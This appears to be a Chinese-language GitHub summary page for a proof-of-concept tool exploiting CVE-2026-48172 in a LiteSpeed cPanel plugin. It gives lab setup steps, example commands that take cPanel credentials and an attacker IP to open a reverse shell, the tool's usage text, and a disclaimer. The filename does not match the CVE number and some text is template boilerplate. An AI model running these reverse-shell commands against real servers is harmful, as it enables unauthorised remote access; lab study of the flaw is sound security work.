HORKimhab/CVE-2026-48172
GitHub: HORKimhab/CVE-2026-48172
CVE-2026-48172 的概念验证工具,演示 LiteSpeed cPanel 插件中 Redis TLS 漏洞的反向 Shell 利用方式,供安全研究与教育使用。
Stars: 1 | Forks: 0
# 📚 教育性安全研究仓库
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
## ⚡ 简易使用
仅在安全和已授权的环境中使用此项目,例如:
- 本地虚拟机
- Docker 容器
- 隔离的实验室环境
- 授权的渗透测试环境
示例配置:
```
git clone https://github.com/HORKimhab/CVE-2026-48172 && cd CVE-2026-48172
cd lab
docker compose up --build -d
cd ..
```
示例用法:
```
# 对于 localhost(自动使用 HTTP)
python3 cve-2026-48712.py -u test -p test -H localhost:2083 -i 192.168.1.100
# 对于 remote server(使用 HTTPS)
python3 cve-2026-48712.py -u test -p test -H example.com:2083 -i 192.168.1.100
usage: cve-2026-48712.py [-h] -u USER -p PASSWORD [-H HOST] -i ATTACKER_IP [-P ATTACKER_PORT]
CVE-2026-48172 PoC - LiteSpeed cPanel Redis TLS Reverse Shell
options:
-h, --help show this help message and exit
-u, --user USER cPanel username
-p, --password PASSWORD
cPanel password
-H, --host HOST cPanel host with protocol and port (default: http://localhost:2083)
-i, --attacker-ip ATTACKER_IP
Your IP for reverse shell
-P, --attacker-port ATTACKER_PORT
Reverse shell port (default: 8443)
```
将上面的命令替换为您实际的项目配置步骤。
## 致谢与参考
- https://nvd.nist.gov/vuln/detail/CVE-2026-48172
- https://thehackernews.com/2026/05/litespeed-cpanel-plugin-cve-2026-48172.html
- https://www.cve.org/CVERecord?id=CVE-2026-48172
## ⚠️ 安全与法律免责声明
## 目的
本仓库仅供**教育和授权的安全研究使用**。
旨在帮助用户了解:
- 安全漏洞
- 沙箱和隔离概念
- 安全编码和防御实践
## 仅限授权使用
仅在您已获得权限的环境中使用本仓库,例如:
- 个人实验室或虚拟机
- Docker 或隔离环境
- 授权的渗透测试
- 网络安全培训或学术研究
严禁未经授权或非法使用。
## 免责声明
作者和贡献者对本项目造成的任何损坏、滥用、法律问题或损失**概不负责**。
使用本仓库即表示您同意:
- 您对自己的行为负责
- 您将以合法和道德的方式使用它
- 本项目按“原样”提供,**不提供任何担保**
## 道德使用
本项目旨在用于:
- 防御性安全研究
- 网络安全教育
- 漏洞意识提升
- 安全系统和软件研究
请遵循负责任的披露实践,并遵守所有适用的法律。
## 联系方式
如需进行负责任的披露或合作,请通过 GitHub 联系仓库维护者。
标签:CISA项目, cPanel, PoC, Redis, 反弹Shell, 暴力破解, 版权保护, 请求拦截, 逆向工具